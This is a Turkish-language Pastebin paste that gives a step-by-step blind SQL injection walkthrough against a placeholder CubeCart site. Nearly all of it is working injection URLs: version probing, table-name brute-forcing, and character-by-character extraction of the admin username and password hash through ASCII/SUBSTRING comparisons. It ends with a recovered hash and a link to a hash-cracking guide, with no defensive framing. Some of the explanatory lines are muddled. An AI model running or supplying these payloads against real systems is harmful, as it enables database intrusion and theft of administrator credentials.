Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Sürüm’ü sorgulayalım..
- http://HEDEFSITE/index.php?id=5 and substring (@@version, 1,1) = 5- –
- yaptık sayfa true (doğru) döndü. Eğer 4 yerine 5 yazsaydık versiyon 5 olmadığı için 404.php hatası verecekti.
- He bu arada Myql Versiyonu 5 :
- Yazdık sürüm 2. 1 …1 ekrana yansıdı.
- Şimdi select yani seçme komutunu kabul edip etmediğine bakalım.
- http://HEDEFSITE/index.php?id=5 and (select 1)=1– –
- Sayfa yine true döndü sorun yok devam.
- Not:Burda Blind SQL olup olmadığını öğrenmek içindir.
- sub select Tablo_ismi bruteforce(yani tahmin) genelde olabilecek tablo isimleri deneyelim.
- Örneğin; “admin” yazalım.
- http://HEDEFSITE/index.php?id=5 and (select 1 from admin)=1– –
- Eğer admin isminde tablo yoksa hata verecektir zaten var ise sayfa normal yüklenecektir.
- Eğer ki sayfa olduğu gibi tekrardan gelir ise bu admin adlı bir tablo bulunduğunun işaretir.
- Şimdi mesela biz bruteforce tarafından tabloyu tahmin olarak bulduk.
- http://HEDEFSITE/index.php?id=5 and (select 1 from CubeCart_admin_users)=1– –
- yaptığımızda CubeCart_admin_users isimli bir sütun olduğundan dolayı problemsiz olarak sayfa true dönecektir.
- Diyelim ki hata verdi.
- Biz bunu bypass yöntemini kullanarak aşabiliriz.”limit” komutunu kullanarak aşalım.
- http://HEDEFSITE/index.php?id=5 and (select 1 from CubeCart_admin_users limit 0,1)=1– –
- Böyle yazdık hata verdi.
- Şimdi ise bir de ” limit 1,1)=1– ” komutuyla deniyelim..
- http://HEDEFSITE/index.php?id=5 and (select substring(concat(1,username),1,1) from CubeCart_admin_users limit 1,1)=1– –
- Yazdık sayfa düzeldi.Şimdi CubeCart_admin_users tablosuna ait sütunları(kolon) test edelim;
- http://HEDEFSITE/index.php?id=5 and (select substring(concat(1,username),1,1) from CubeCart_admin_users limit 1,1)=1– –
- Yazdık sayfa true döndü. Diğer columnuda password olarak buldum.
- Devam edelim şimdi “username” ve “password” u birleştirip 1.harf 2.harf 3.harf … diye giderek verileri çekmeye başlayalım.
- Verileri birleştirme ve harf1’den başlama;
- biz onun parametreye verecek olursa olsun ASCII değeri dönecektir burada hangi ASCII fonksiyonunu kullanacağız
- http://HEDEFSITE/index.php?id=5 and ASCII(SUBSTRING((select username from CubeCart_admin_users limit 0,1),1,1))>1– –
- Komutumuz bu burada tablo ve column bilgilerini yazıcaz.
- Bu 97 kısmı ne derseniz?
- Ascii karakterleridir, harflerin sayı karşılığıdır.
- Burada ASCII tablosu için bakabilirsiniz.
- asciitable.com/
- a = 97
- ve benzeri
- A = 65
- bu tablodan görebilirsiniz
- http://HEDEFSITE/index.php?id=5 and ASCII(SUBSTRING((select username from CubeCart_admin_users limit 0,1),1,1))=112– –
- Yazdık hata vermedi,bizim asıl amacımız hata verdirmek.
- Şimdi bir sonraki değeri deniyelim.
- http://HEDEFSITE/index.php?id=5 and ASCII(SUBSTRING((select username from CubeCart_admin_users limit 0,1),2,1))=111– –
- hata vermedi devam edelim..
- http://HEDEFSITE/index.php?id=5 and ASCII(SUBSTRING((select username from CubeCart_admin_users limit 0,1),10,1))>96– –
- Yine hata yok.
- http://HEDEFSITE/index.php?id=5 and ASCII(SUBSTRING((select password from CubeCart_admin_users limit 0,1),21,1))>52– –
- Yazdık sayfa hata verdi, ve karşımızda kullanıcı adı ve hash’ı
- kullanıcı adı: HEDEFSITE
- admin şifre: 9f66bf57850fbae64d515ffcb8ca6166
- Bu kadar, Kolay gelsin..
- MD5 Kırma Konusuna burdan devam ediniz - Yine kendi anlatımım. Hayırlı Kullanımlar
- cyberizm.org/cyberizm-md5-sifre-kirmayla-alakali-hersey-videolu-resimli-anlatim.html
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement